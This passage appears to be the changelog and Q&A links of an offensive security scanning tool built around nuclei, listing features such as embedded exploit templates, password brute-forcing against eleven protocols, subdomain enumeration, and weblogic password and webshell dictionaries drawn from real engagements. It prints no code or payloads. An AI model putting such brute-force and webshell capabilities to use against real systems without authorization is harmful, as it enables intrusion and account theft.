  • Semi-automatic fingerprint learning to improve accuracy; specify fingerprint name, configure

Q & A

  • how use Cookie?
  • libpcap related question

more see: discussions


  • 2022-07-20 fix and PR nuclei #2301 并发多实例的bug
  • 2022-07-20 add web cache vulnerability scanner
  • 2022-07-19 PR nuclei #2308 add dsl function: substr aes_cbc
  • 2022-07-19 添加dcom Protocol enumeration network interfaces
  • 2022-06-30 嵌入式集成私人版本nuclei-templates 共3744个YAML POC; 1、集成Elasticsearch存储中间结果 2、嵌入整个config目录到程序中
  • 2022-06-27 优化模糊匹配,提高正确率、鲁棒性;集成ksubdomain进度
  • 2022-06-24 优化指纹算法;增加工作流程图
  • 2022-06-23 添加参数ParseSSl,控制默认不深度分析SSL中的DNS信息,默认不对SSL中dns进行扫描;优化:nmap未自动加.exe的bug;优化windows下缓存文件未优化体积的bug
  • 2022-06-22 集成11种协议弱口令检测、密码爆破:ftp、mongodb、mssql、mysql、oracle、postgresql、rdp、redis、smb、ssh、telnet,同时优化支持外挂密码字典
  • 2022-06-20 集成Subfinder,域名爆破,启动参数导出EnableSubfinder=true,注意启动后很慢; ssl证书中域名信息的自动深度钻取 允许通过 config/config.json 配置定义自己的字典,或设置相关开关
  • 2022-06-17 优化一个域名多个IP的情况,所有IP都会被端口扫描,然后按照后续的扫描流程
  • 2022-06-15 此版本增加了过去实战中获得的几个weblogic密码字典和webshell字典
  • 2022-06-10 完成核的整合,当然包括核模板的整合
  • 2022-06-07 添加相似度算法来检测 404
  • 2022-06-07 增加http url列表精准扫描参数,根据环境变量UrlPrecise=true开启
